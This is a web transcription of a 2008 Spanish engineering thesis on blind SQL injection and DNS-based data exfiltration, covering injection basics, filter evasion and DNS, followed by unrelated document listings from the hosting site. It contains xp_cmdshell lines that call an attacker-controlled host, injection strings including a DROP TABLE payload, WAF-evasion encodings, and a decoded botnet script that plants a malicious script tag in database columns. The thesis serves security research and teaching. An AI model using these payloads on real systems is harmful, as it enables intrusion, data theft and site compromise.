UNIVERSIDAD PONTIFICIA COMILLAS

Tamaño: px
Comenzar la demostración a partir de la página:

Download "UNIVERSIDAD PONTIFICIA COMILLAS"

Transcripción

1 UNIVERSIDAD PONTIFICIA COMILLAS ESCUELA TÉCNICA SUPERIOR DE INGENIERÍA (ICAI) INGENIERO EN INFORMÁTICA PROYECTO FIN DE CARRERA WEAPONIZED BLIND SQL INJECTION EXPLOITATION AND CONTENT RETRIEVAL ON SQL SERVER SYSTEMS VIA DNS DATA EXFILTRATION AND CROSS-DMZ TUNNELING PERTRECHAMIENTO DE ATAQUES DE INYECCIÓN SQL CIEGA Y EXTRACCIÓN DE CONTENIDO EN SISTEMAS SQL SERVER MEDIANTE EXFILTRACIÓN DE DATOS VÍA DNS Y ENCAMINAMIENTO SOBRE LA ZONA DESMILITARIZADA AUTOR: Ángel Prado Montes DIRECTOR: Adrian Bethune Madrid, Septiembre 2008

2 Autorizada la entrega del proyecto del alumno/a: Angel Prado EL DIRECTOR DEL PROYECTO Adrian Bethune Fdo.: Fecha: / 09 / 08 Vº Bº del Coordinador de Proyectos David Contreras Bárcena Fdo.: Fecha: / 09 / 08

3 UNIVERSIDAD PONTIFICIA COMILLAS ESCUELA TÉCNICA SUPERIOR DE INGENIERÍA (ICAI) INGENIERO EN INFORMÁTICA PROYECTO FIN DE CARRERA WEAPONIZED BLIND SQL INJECTION EXPLOITATION AND CONTENT RETRIEVAL ON SQL SERVER SYSTEMS VIA DNS DATA EXFILTRATION AND CROSS-DMZ TUNNELING PERTRECHAMIENTO DE ATAQUES DE INYECCIÓN SQL CIEGA Y EXTRACCIÓN DE DATOS EN SISTEMAS SQL SERVER MEDIANTE EXFILTRACIÓN DE DATOS VÍA DNS Y ENCAMINAMIENTO SOBRE LA ZONA DESMILITARIZADA AUTOR: Ángel Prado Montes DIRECTOR: Adrian Bethune Madrid, Septiembre 2008

4 AGRADECIMIENTOS A mis padres, cuya tenacidad e insistencia ha permitido que mi formación académica llegase a buen puerto. A José Luís Gahete, por ser un referente en los buenos momentos y dificultades varias durante mi vida académica. A Miguel Ángel Sanz Bobi, por inspirarme en este arte llamado ingeniería bien antes de formar parte de esta casa. A todos mis grandes amigos de Microsoft USA y Microsoft Ibérica, con especial mención a mi colega Chema Alonso de informática 64 y MVP de Windows Security, cuya investigación sobre inyección de SQL a ciegas por tiempo con consultas pesadas me ha servido de gran referente. Por último, extender mis agradecimientos a Adrian Bethune, mi coordinador de proyecto en Estados Unidos y gran guía en mi aventura americana.

5 RESUMEN La inyección SQL es uno de los ataques más conocidos y documentados hoy en día, e identificado como uno de los vectores más frecuentes para ataques en aplicaciones web por el instituto internacional SANS en su informe anual de riesgos de seguridad En los comienzos de estos ataques, era más sencillo encontrar un sitio web vulnerable que uno que no lo fuese. A medida que avanzaron los años, los administradores de cortafuegos prepararon mecanismos de protección entorno a aplicaciones basadas en datos para evitar que los atacantes pudieran revertir conexiones TCP en su búsqueda insaciable para obtener información ajena cuando los métodos tradicionales de inyección con devolución de resultados no estaban presentes. Durante años, los diferentes agentes han sido alertados del peligro que suponen los ataques de inyección SQL ciega, si bien a día de hoy nos encontramos con numerosos sitios en operación, totalmente vulnerables. Los desarrolladores web y administradores de sistemas no son conscientes de cual es el impacto real de estas vulnerabilidades. Herramientas modernas como Absinthe, SQL Ninja o SQL Brute son capaces de explotar inyección SQL ciega hoy por hoy. Sin embargo, el actual estado del arte es un tanto lento y limitado al paradigma de la booleanización, que consiste en extraer 1 bit por cada consulta formulada específicamente para retornar un resultado verdadero o falso, o utilizando métodos de espera como WAITFOR para, lentamente, obtener datos de una forma binaria. Es evidente que ante la ausencia de métodos convencionales, la extracción de datos mediante inyección SQL ciega puede consumir mucho tiempo y producir un ruido de tráfico no deseable. Dado que la inyección es ciega, el atacante no puede obtener datos con los convencionales UNION SELECT o utilizar mensajes de error. Incluso con la ayuda de herramientas I

6 automatizadas, este proceso es lento dado que el atacante necesita una petición por cada bit de datos que desea extraer, resultando en cientos o miles de consultas. Estos métodos tradicionales son fácilmente detectados por mecanismos de detección de intrusos y no proporcionan un canal sostenible y estable para obtener los datos de una aplicación insegura. Este proyecto describe una nueva alternativa más veloz basada en el protocolo DNS como mecanismo de transmisión. Las diferentes técnicas que pueden utilizar los atacantes para explotar la exfiltración DNS también son ilustradas, introduciendo nuevas posibilidades para alcanzar lo que antes eran puntos de acceso de inyección ciega incontrovertibles. Esto permite a un atacante malicioso atravesar la cadena de resoluciones DNS y cruzar las zonas corporativas desmilitarizadas (DMZ) con una facilidad preocupante. Un atacante puede entonces capturar el tráfico desde su servidor DNS local y observar las consultas entrantes con datos encapsulados. Durante el curso de la investigación preliminar, se proveen ejemplos educativos para atacar a diferentes versiones de los motores de bases de datos Microsoft SQL Server, MySQL y Oracle. Si bien este proyecto está centrado alrededor de estas plataformas, el concepto es aplicable a la mayoría de los productos comerciales de bases de datos. Finalmente, la herramienta prueba de concepto en la que se basa este proyecto es revelada, cubriendo tópicos técnicos variados desde su desarrollo hasta los protocolos internos de transferencia hexadecimal. Se proporcionan demostraciones de escenarios donde se ejecuta la herramienta para mostrar las diferentes formas de obtener el esquema de una base de datos y los datos de sus diferentes tablas de una forma totalmente automatizada, utilizando DNS como el mecanismo principal de extracción. II

7 A diferencia de otras herramientas, lo que aquí se presenta no requiere disparidad alguna entre consultas satisfactorias e insatisfactorias para acometer su objetivo. Su ancho de banda es sustancialmente más rápido comparado con métodos existentes, dado que se pueden obtener hasta 200 caracteres por consulta, al contrario que los sistemas actuales de un bit simultaneo. Adicionalmente, la herramienta no requiere diferencias significativas en tiempo. Con la descripción del funcionamiento interno de estos nuevos ataques y la exposición de una herramienta automatizada para la explotación de los mismos, el autor pretende subrayar la importancia de establecer prácticas de desarrollo seguro para aplicaciones web, y no confiar la seguridad de sitios online enteramente a defensas perimetrales muchas veces configuradas inconsistentemente. El propósito último es que la comunidad se percate de que la información confidencial es extremamente susceptible a estos ataques, y sólo se requiere un punto de acceso SQL para comprometer la seguridad de una organización al completo. III

8 ABSTRACT SQL Injection is widely known and documented as one of the top two attack vectors for web applications, as identified by the international SANS institute in the 2007 annual security risks update. In the early days of these attacks it was almost easier to locate a vulnerable website than not. More and more, firewall administrators setup protection mechanisms around data driven applications to prevent attackers from easily reverting TCP connections on their quest for private data leaking whenever the obsolete verbose methods are not present. For years, people have been warned about blind SQL injection attacks, yet to this day we still find plenty of vulnerable websites out there. Web developers and system administrators do not fully realize what the real impact of these vulnerabilities is. Modern tools like Absinthe, SQL Ninja or SQL Brute assist in exploiting blind SQL injection today. However, the current state of the art is rather slow and limited to the data booleanization paradigm, which consists in extracting 1 bit at a time by asking yes or no queries or using WAITFOR delay methods in order to slowly retrieve data in a bitwise fashion. It s clear that when conventional methods are not possible, exfiltrating data via blind SQL injection vulnerabilities can be rather time-consuming, not to mention undesirably noisy. Since the injection is blind, the attacker can t just retrieve data with a conventional UNION SELECT or by using standard error messages. Even with the help of automated tools, this process is slow due to the fact that an attacker would normally require 1 request for each bit of data to be extracted, resulting in several hundreds or even thousands of queries. Traditional exploitation of blind SQL injection easily triggers intrusion detection mechanisms and does not provide a reliable channel for obtaining data back from a compromised application

9 This project describes a new, faster alternative based on DNS. The different techniques for attackers to take advantage of SQL Injection vulnerabilities using DNS exfiltration are also illustrated, unlocking new possibilities of reaching previously incontrovertible blind SQL injection access points. This enables an attacker to easily traverse the DNS resolver chain and happily cross corporate demilitarized zones (DMZ). An attacker can then sniff traffic to his DNS server endpoint and watch for incoming encapsulated data requests. During the course of the preliminary research, educational exploitation examples for different versions of Microsoft SQL Server, MySQL and Oracle database engines are provided. While this project and tool are focused around these platforms, the concept is applicable to most commercial database products. Finally, the proof-of-concept tool this project revolves around is revealed, covering topics ranging from its development to the internal hexadecimal data transfer protocols. The tool is exercised in a comprehensive way to evidence the different ways to fetch a database schema and data from its tables in an automated fashion, by using DNS as its core exfiltration mechanism. Unlike other tools, what is presented here does not require any disparity between successful and unsuccessful queries to work. Its throughput is substantially faster than existing methods since it can retrieve up to 200 characters per query, versus the conventional one byte of information at a time approaches. In addition, noticeable differences in timing are not required. By describing the inner workings of these new attacks and providing an automated tool for its exploitation, the author aims to stress the importance of establishing secure development best practices for web applications and not only to entrust site security to the loosely configured perimeter - 2 -

10 defences. The ultimate purpose is to help people realize that their confidential information is extremely susceptible to these attacks, and it only takes one SQL access point to compromise an entire organization

11 ÍNDICE 1. Introducción y Planteamiento del proyecto Introducción Conceptos básicos SQL Inyección SQL Técnicas de evasión de filtrado Protocolo DNS DMZ Shell inversa Sistemas IDS Motivación Objetivos principales del proyecto Estado del arte Técnicas de exfiltración de datos Inyección con salida directa HTML en línea Inyección Ciega Basada en errores Basada en cambio en página Basada en tiempo con consultas pesadas Alternativas Nueva técnica: Exfiltración DNS Conceptos fundamentales Exfiltración DNS Obteniendo la estructura de tablas Desarrollo

12 Introducción Funcionamiento interno Protocolo de codificación sobre DNS Arquitectura Limitaciones de DNS Gestión de duplicados Integridad de envíos Como evitar ataques SQL Análisis económico del proyecto Introducción Coste de investigación Coste de tecnología Coste de implantación Costes operacionales Conclusión Planificación del proyecto Trabajo futuro y conclusiones Bibliografía Anexo I: Código fuente, binarios y manual

13 Capítulo 1 Introducción y Planteamiento del proyecto - 6 -

14 1.1 INTRODUCCIÓN Hoy por hoy los vectores de ataque basados en inyección SQL son sobradamente entendidos por la comunidad, y el número de sitios web que son vulnerables crece continuamente de una forma alarmante. En el pasado, era bastante común que los servidores SQL comprometidos en ataques estuvieran detrás de un cortafuegos bastante liberal, facilitando al atacante conectar a su IP de destino o proxy desde el servidor SQL comprometido mediante una shell inversa para establecer un canal funcional. Sin embargo, últimamente, los administradores de firewall han comenzado a imponer bloqueos y políticas de seguridad para las aplicaciones basadas en datos (data driven applications) y mejoraron sus arquitecturas de seguridad. Fue entonces cuando los hackers empezaron a comprender que las conexiones reversas TCP, fundación de muchas shells inversas y ataques clásicos, ya no eran tan efectivas. Es patente que los ingenieros de cortafuegos estaban adelantados en su tiempo a los desarrolladores de aplicaciones web. Esto dejo a las mentes siempre creativas de aquel que desea la información ajena con dos opciones obvias: Encontrar un canal UDP para determinar si la ejecución del código era satisfactoria, o hacer uso de ataques basados en tiempo o errores para determinar si el código se llegaba a ejecutar satisfactoriamente. Una alternativa interesante, es que la mayoría de implantaciones de sistemas operativos proveen un canal UDP para determinar si nuestro código se está ejecutando satisfactoriamente, gracias al ubicuo comando nslookup. Básicamente, si un atacante creía que se estaba ejecutando su sentencia a través de una cadena de inyección SQL, el siguiente código bastaría para una simple verificación: Ángel Prado Septiembre

15 exec master..xp_cmdshell('ping n 10 ip.ata.can.te'). De esta forma, el atacante monitorizaría el trafico dns hacia su máquina, mediante herramientas como netcat o capturando el trafico utilizando sniffers a nivel de red como ethereal. Si el atacante era capaz de ver una consulta ICMP procedente del servidor infectado, esto sería una clara señal de que la ejecución ciega estaba ocurriendo satisfactoriamente. En caso de que el servidor bloquease tráfico ICMP, una simple resolución de nombre de dominio serviría como punto de contacto: exec master..xp_cmdshell('nslookup mihostname.es') De esta forma, incluso si SQL Server fuese incapaz de realizar peticiones DNS externas directamente, la petición de nslookup atravesaría la cadena de resolución y eventualmente algún servidor DNS transferiría mediante delegación la petición inicial hacia el servicio residente en mihostname.es Esto sirve exclusivamente como propósito de confirmación: cuando el atacante lleva a cabo su inyección, simplemente necesita capturar el tráfico entrante en su servidor DNS para ver las peticiones externas, y confirma que efectivamente, xp_cmdshell y cualquier código asociado se ejecuto satisfactoriamente en la máquina víctima. Aunque el puerto UDP estuviera abierto, no se puede establecer una conexión directa con el atacante bajo UDP:53 pues el cortafuegos lo impedirá en condiciones normales. Sin embargo, nada nos impide hacer Ángel Prado Septiembre

16 llegar la confirmación mediante el sistema de delegación en cadena propio de DNS. La siguiente figura ilustra este concepto: Si bien esto es innovador, este proyecto estudiará y llevará a cabo la posibilidad de obtener más que una mera confirmación de ejecución a través de la consulta DNS. Las técnicas que se han utilizado hasta ahora para transmitir datos en inyecciones ciegas (no solo confirmación de éxito) utilizaban cmd.exe o /bin/sh con varios bucles para inyectar SQL, y posteriormente tratar de establecer una conexión inversa con la máquina atacante o un pivote. Para establecer la conexión, se suele utilizar algún puerto común con posibilidades de estar abierto, como por ejemplo el 80. Tras establecer la conexión, facilitaría al atacante los datos que desease (exportar la base de Ángel Prado Septiembre

17 datos entera, por ejemplo), o permitiría la habilidad de ejecutar comandos remotos vía shell con un redirector de comandos. Este tipo de ataque exigía subir un binario a la máquina objetivo, y posteriormente que el binario pudiese realizar una conexión inversa desde la máquina atacante vía TCP, y además asumir que la máquina del atacante estuviera escuchando por TCP y online en ese momento, y no fuera desconectada por el proveedor de servicios. El hecho de poder subir ficheros remotamente a la máquina víctima y establecer conexiones TCP salientes es ya poco frecuente debido a las nuevas políticas de seguridad actuales. La pregunta es ambiciosa: Podemos ejecutar comandos y transferir contenidos enteros de una base de datos mediante inyección SQL en páginas cuyo ataque resulta en una salida completamente normal (inyección ciega)? Todo ello automatizado, sin necesidad de requerir privilegios elevados, sin tener que subir ejecutables, independiente de la arquitectura y marca de base de datos, y sin requerir tráfico TCP saliente. Como diría Michael Howard, experto de seguridad en Microsoft Corp. y autor del famoso libro Writing Secure Code: Una entrada al sistema es un mal hasta que se demuestre lo contrario. Y es precisamente lo que vamos a respaldar. 1.2 CONCEPTOS BÁSICOS A continuación se ofrece una definición de los diferentes conceptos preliminares que serán utilizados a lo largo de las páginas venideras SQL Ángel Prado Septiembre

18 SQL (Structured Query Language) es el lenguaje declarativo de consulta estructurado de acceso a bases de datos diseñado para la obtención y gestión de datos en sistemas relacionales de bases de datos (RDBMS). Además, provee la creación y modificación de esquemas y acceso a objetos. Algunos de los sistemas más populares con los que interactuaremos son Microsoft SQL Server, Oracle SQL, IBM DB2 y MySQL. Hoy en día todos los lenguajes de programación web populares como PHP, ASP, JSP y RUBY proveen interfaces, no siempre seguras, para conectar con estos sistemas de bases de datos INYECCIÓN SQL La inyección SQL, también conocida como SQL Injection consiste en insertar código SQL dentro de un parámetro web HTTP GET o POST que forma parte de una variable que posteriormente se incluirá como parte de una consulta SQL superior, con el objetivo de alterar su comportamiento habitual. Esto sucede debido a un pobre e insuficiente filtrado a nivel de validación de la aplicación, que nos permite insertar código SQL malicioso dentro de variables que son posteriormente utilizadas para realizar un propósito diferente al inicialmente pensado por el programador. Caso práctico Imaginemos que tenemos una página web que nos permite ver el perfil del usuario actual. Por ejemplo: El código residente en verperfil.aspx contiene lo siguiente: Ángel Prado Septiembre

19 resultado := "SELECT * FROM usuarios WHERE identificadorusuario = '" + Request.Get("ID") + "';" Uno podría pensar, a buen criterio, que quizás podríamos acceder al perfil de otro usuario mediante la siguiente consulta: Pero suponiendo que hubiera alguna cookie o gestión lógica de sesión que nos lo impidiera, siempre podríamos explotar una vulnerabilidad SQL mediante la inserción del siguiente parámetro en la variable GET, para acceder ilegalmente a todos los usuarios escapando de la consulta original: ID= OR '1'= '1' Aunque la mayoría de las implementaciones de SQL Server permiten ejecutar varias consultas a la vez, la función de php mysql_query solo permite una consulta por motivos de seguridad. Sin embargo esto no impide que usuarios malintencionados modifiquen la consulta. El siguiente ejemplo es una inyección que borraría la tabla de usuarios en un sistema que permitiera múltiples consultas: ID=a';DROP TABLE users; Por último, un ejemplo más sencillo suponiendo que podemos ver por entero la salida de nuestra consulta SQL, sería realizar una subconsulta (subquery) o un enlace UNION para obtener los datos que buscamos: ID=1 UNION SELECT * FROM usuarios Ángel Prado Septiembre

20 Como podemos ver, un atacante puede alterar fácilmente cualquier consulta susceptible de inyección para lograr un resultado funcional pero esperado por la aplicación. Evidentemente el ataque es tan peligroso en la medida de los datos que se desean interceptar. Los atacantes no necesitan ni siquiera ser conocedores del lenguaje estructurado. Decenas de herramientas como SQL Ninja o Metasploit proveen frameworks para utilizar todo tipo de payloads de una forma automatizada, y obtener información privada, tarjetas de crédito, y contraseñas. A menudo, la información más valiosa suele estar con un hash aplicado. Aplicaciones populares utilizan md5 que promete encriptar contraseñas sin guardar su valor. La realidad es que cualquier clave en md5 puede romperse en unos 20 minutos utilizando técnicas de como tablas de lookup precomputadas (rainbow tables). SQL Ninja automatizando un ataque SQL, en acción En resumen, un agujero de este tipo deja prácticamente nuestra base de datos en manos de hackers maliciosos y su creatividad. Las protecciones Ángel Prado Septiembre

21 por defecto no son suficientes como veremos en los capítulos subsiguientes, si bien expondremos las mejores prácticas para detener este tipo de ataques TÉCNICAS DE EVASIÓN DE FILTRADO Si bien es cierto que los desarrolladores y fabricantes de software han creado soluciones para evitar esta creciente amenaza, los atacantes, incansables en su odisea, siempre encuentran una forma creativa de saltarse mencionadas protecciones. La detección de ataques SQL se ha realizado históricamente mediante expresiones regulares o firmas de keywords previamente establecidas, lo que se conoce como blacklisting. Sin embargo esta técnica ya no es efectiva y los atacantes son capaces de encontrar consultas que pasarán inadvertidas a través de las múltiples capas de infraestructura, incluso engañando a web firewalls y módulos como el popular apache mod_security. Las expresiones regulares fracasan porque no pueden expresarse para todos los campos. Por ejemplo, no existe virtualmente ninguna expresión regular o patrón que pueda regular la descripción de una dirección física. Inicialmente, los sistemas de detección basados en firmas y patrones funcionaban con precisión dado que los ataques realizados eran muy básicos y utilizaban comandos SQL relativamente simples. Un simple ;DELETE FROM USERS WHERE 1=1 era suficiente para destrozar los datos de una organización si los desarrolladores no habían anticipado esa posibilidad. Sin embargo, estas técnicas rápidamente se encontraron con nuevos mecanismos de protección basados en reconocimiento de patrones. Las variaciones del lenguaje permiten construir expresiones sintácticamente válidas si bien intrínsicamente peligrosas. El problema fundamental radica en que SQL permite muchas variaciones en la forma de que los comandos Ángel Prado Septiembre

22 son construidos, incluyendo codificación multilenguaje, variación de espacios, comentarios... Ataque SQL tradicional: OR 1 = 1 Técnica de evasión: manipulación de espacios Nuevo ataque: OR 1 = 1 Ataque SQL tradicional: &id=111 UNION /* */ SELECT * Técnica de evasión: rotura de comentarios para evitar expresiones regulares basadas en lista negra (SELECT, UNION ) Nuevo ataque: &id=111/*este es un comentario */UN/* puedes */IO/* encontrar */N/**/S/**E/* */LE/* el parámetro maligno?*/ct/*difícilmente */ Ataque SQL tradicional: 1 UNION SELECT ALL FROM TABLE Técnica de evasión: Codificación decimal Ángel Prado Septiembre

23 Nuevo ataque: &#49&#32&#85&#78&#73&#79 &#69&#82&#69 Ataque SQL tradicional: OR 1 = 1 Técnica de evasión: variación de temática Nuevo ataque: OR ciudad = ciudad Este tipo de variaciones son más frecuentes de lo que parecen. Recientemente, decenas de miles de máquinas ejecutando instancias SQL Server con validación de parámetros insegura fueron comprometidas por una rede de robots (botnet) automatizada que reemplazaba todas las entradas de la base de datos con un iframe apuntando a JavaScript malicioso. El código utilizado en cuestión tiene el siguiente patrón: Ángel Prado Septiembre

24 C C C F F F F C E006E D C E006E D F006D F A C F006C D006E E D E E E D E E D F E D F E D F E D F E C F F E F004D C F F E F C C F D E B B B D B B B D003D D F006E C005B B B D B C D A002F002F E E F006D002F A E0 06A E003C002F E E F004D C F F E F C E C004F C F F C004C004F C Lo cual obviamente salta cualquier protección firewall, sobre todo si se transmite mediante HTTP POST, al carecer de expresiones reconocibles para cortafuegos a nivel lógico. Ángel Prado Septiembre

25 Este código, una vez descifrado por el agente SQL, se traduce en lo siguiente varchar(255) DECLARE Table_Cursor CURSOR FOR Select a.name,b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO BEGIN exec('update set ''<script src=http://www.evilpage.com/fjp.js></script>''') FETCH NEXT FROM Table_Cursor INTO END CLOSE Table_Cursor DEALLOCATE Table_Cursor Esto es posible debido a la evasión utilizada mediante el comando CAST() que convierte el largo texto en hexadecimal a NVARCHAR y finalmente ejecuta dicha cadena de texto. El código SQL que finalmente se ejecuta efectivamente hace un bucle sobre todas las columnas textuales de la base de datos y adjunta un script HTML que comprometerá los navegadores vulnerables de todos los visitantes del sitio legítimo. Todo ello en un proceso automatizado mediante una botnet distribuida. Ángel Prado Septiembre

26 La pregunta de cómo un atacante encuentra sitios vulnerables es algo a lo que no vamos a dedicar tiempo en este proyecto. Desde un escaneo heurístico en alojamiento compartido hasta métodos tan rústicos como búsquedas en Google sobre un nombre determinado de script php/asp/jsp vulnerable se pueden combinar para encontrar una lista interminable de víctimas PROTOCOLO DNS El servicio de DNS (Domain Name System) es un sistema de nombres de dominio utilizado para asignar nombres (hostnames) a los diferentes ordenadores y dispositivos en Internet. Nos permite resolver nombres de máquinas (A ZONEs) a direcciones IP y viceversa (reverse dns lookup). Por ejemplo, host: se traduce a la dirección IP estática El protocolo DNS tiene una estructura jerárquica de dominios, separados por puntos y que empiezan por el subdominio inferior o de primer nivel. Las normas para los dominios vienen determinadas por la ICANN (Internet Corporation for Assigned Names and Numbers). Dominios de nivel superior incluyen.com (comercial),.net (networking) y.org (organización). Dominios geográficos suponen otra gran parte de la distribución total, por ejemplo.es indica España y.us es el símbolo para los Estados Unidos de América. En el protocolo DNS, cada dominio por debajo de los dominios de primer nivel puede estar formado como máximo por 63 caracteres (este es un dato importante que utilizaremos más adelante). Generalmente la longitud Ángel Prado Septiembre

27 máxima de un dominio en total, incluyendo dos niveles de subdominio no debe exceder los 200 caracteres. No se permite el uso de caracteres especiales. Simplemente a-z, A-Z, 0-9 y el guión simple -. Una solicitud DNS se realiza generalmente por el puerto UDP 53 (NAMESRV). El cliente pide al servidor DNS inmediato que tenga configurado la resolución de dicho host. En el caso de que el servidor no tenga dicho host en el caché, o que esté en el caché pero con un TTL expirado, el servidor inmediato delegará la petición hacia arriba de la cadena, hasta llegar eventualmente a un servidor que conozca la respuesta o hacia los registros NS del denominado root server (servidor raíz), que devolverá la IP del dominio en cuestión y delegará en sus registros NS para resolver cualquier subdominio asociado. Finalmente, el servidor DNS del dominio a resolver tiene la última palabra sobre que IP corresponde a que subdominio, y trata directamente todas las consultas que no se encuentren almacenadas en la caché. El comando nslookup puede indicarnos cuales son los servidores NS principales asociados a un dominio determinado. El concepto del TTL es particularmente interesante: indica el tiempo que un servidor DNS tiene permitido mantener en la caché cualquier registro existente. Si el TTL es muy bajo, se forzará una consulta hacia dicho dominio tan pronto expire y una nueva query lo requiera. Cabe remarcar que el protocolo DNS es de por si inseguro. Dan Kaminsky, de IOActive y Microsoft USA descubrió recientemente una vulnerabilidad crítica que permite falsificar en cuestión de segundos cualquier dirección DNS en servidores vulnerables. El problema radica en que las direcciones IP de origen pueden ser imperdonadas debido al diseño de UDP, y que el ID de transacción de DNS TXID es de 16 bits, lo cual es débil y fácilmente crackeable. Si esto no fuera suficiente, no es necesario esperar a la expiración del TTL para proseguir con la adivinación del TXID tras un intento Ángel Prado Septiembre

WEAPONIZED BLIND SQL INJECTION EXPLOITATION AND CONTENT RETRIEVAL ON SQL SERVER SYSTEMS VIA DNS DATA EXFILTRATION AND CROSS-DMZ TUNNELING

WEAPONIZED BLIND SQL INJECTION EXPLOITATION AND CONTENT RETRIEVAL ON SQL SERVER SYSTEMS VIA DNS DATA EXFILTRATION AND CROSS-DMZ TUNNELING WEAPONIZED BLIND SQL INJECTION EXPLOITATION AND CONTENT RETRIEVAL ON SQL SERVER SYSTEMS VIA DNS DATA EXFILTRATION AND CROSS-DMZ TUNNELING Autor: Angel Prado Director: Adrian Bethune Entidad colaboradora:

Más detalles

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL AUTOR: Chema Alonso Consultor de Seguridad en Informática 64. Microsoft MVP Enterprise Security

Más detalles

Capítulo 2.- Vulnerabilidades en aplicaciones web.

Capítulo 2.- Vulnerabilidades en aplicaciones web. Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como

Más detalles

SEGURIDAD EN SISTEMAS INFORMÁTICOS

SEGURIDAD EN SISTEMAS INFORMÁTICOS Universidad Pública de Navarra Grupo de Redes, Sistemas y Servicios Telemáticos SEGURIDAD EN SISTEMAS INFORMÁTICOS Práctica 3 Seguridad perimetral: Filtrado de paquetes (Primera Parte) Introducción En

Más detalles

Tema 41.- Medidas de seguridad en conectividad de redes: Cortafuegos, IDS, IPS, filtro de contenidos.

Tema 41.- Medidas de seguridad en conectividad de redes: Cortafuegos, IDS, IPS, filtro de contenidos. Tema 41.- Medidas de seguridad en conectividad de redes: Cortafuegos, IDS, IPS, filtro de contenidos. Introducción...1 1 Cortafuegos Firewall-... 3 1.1 Políticas de control de acceso... 4 1.2 Órganización

Más detalles

Suplemento informativo: aclaración del requisito 6.6 sobre revisiones de códigos y firewalls de aplicaciones

Suplemento informativo: aclaración del requisito 6.6 sobre revisiones de códigos y firewalls de aplicaciones Norma: Normas de Seguridad de Datos (DSS) Requisito: 6.6 Fecha: febrero de 2008 Suplemento informativo: aclaración del requisito 6.6 sobre revisiones de códigos y firewalls de aplicaciones Fecha de publicación:

Más detalles

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal

Más detalles

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.

Más detalles

Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS

Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS Julio 2005 Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas

Más detalles

Bypass WAFs KUNAK CONSULTING. Automatizando SQLi con Python. Omar Palomino. omarc320@gmail.com. opalomino@kunak.com.pe. http://www.el-palomo.

Bypass WAFs KUNAK CONSULTING. Automatizando SQLi con Python. Omar Palomino. omarc320@gmail.com. opalomino@kunak.com.pe. http://www.el-palomo. Bypass WAFs KUNAK CONSULTING Automatizando SQLi con Python Noviembre, 2013 Omar Palomino omarc320@gmail.com opalomino@kunak.com.pe ÍNDICE 1.Inyecciones SQL 2.Inyecciones manuales vs herramientas 3.Nuevos

Más detalles

1) Proxy, Cortafuegos, que son? Pág.2. 2) Funcionamiento de un proxy Pág.3. 3) Proxy NAT / Enmascaramiento Pág.3

1) Proxy, Cortafuegos, que son? Pág.2. 2) Funcionamiento de un proxy Pág.3. 3) Proxy NAT / Enmascaramiento Pág.3 Indice 1) Proxy, Cortafuegos, que son? Pág.2 2) Funcionamiento de un proxy Pág.3 3) Proxy NAT / Enmascaramiento Pág.3 4) Servidores proxy / Servidores de Sockets Pág.4 5) Proxy de web / Proxy cache de

Más detalles

Introducción a ataques de tipo inyección: Inyección SQL

Introducción a ataques de tipo inyección: Inyección SQL Introducción a ataques de tipo inyección: Inyección SQL Jorge Peris Cortés - jorpecor@alumni.uv.es Asignatura: Redes Ingeniería Informática - Curso 2011/2012 Universidad de Valencia 1 Índice INTRODUCCIÓN...

Más detalles

Ministerio de Educación,Cultura y Deporte. Aulas en Red. Windows. Módulo 4: Servicios de Internet. FTP

Ministerio de Educación,Cultura y Deporte. Aulas en Red. Windows. Módulo 4: Servicios de Internet. FTP Ministerio de Educación,Cultura y Deporte. Aulas en Red. Windows Módulo 4: Servicios de Internet. FTP Aulas en red. Aplicaciones y servicios. Windows Servicio FTP Con anterioridad, en este mismo módulo

Más detalles

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web ASIT 20070501 CT Pautas de seguridad para aplicaciones web v1 2007-05-16 Documento de Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web Versión 01 ARCHIVO: ASIT 20070501

Más detalles

Intrusion Detection/Prevention Systems SNORT.

Intrusion Detection/Prevention Systems SNORT. Intrusion Detection/Prevention Systems SNORT. Miguel Angel Rodriguez Yamid Armando Pantoja Juan Carlos Pantoja Universidad de Nariño Facultad de Ingeniería Programa Ingeniería de Sistemas 11 de diciembre

Más detalles

INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas

INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas W8: wexplor VIROLOGÌA Y CRIPTOLOGÌA 4NM73 W8:INTERNET EXPLORER U5: FILE TRANSFER

Más detalles

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

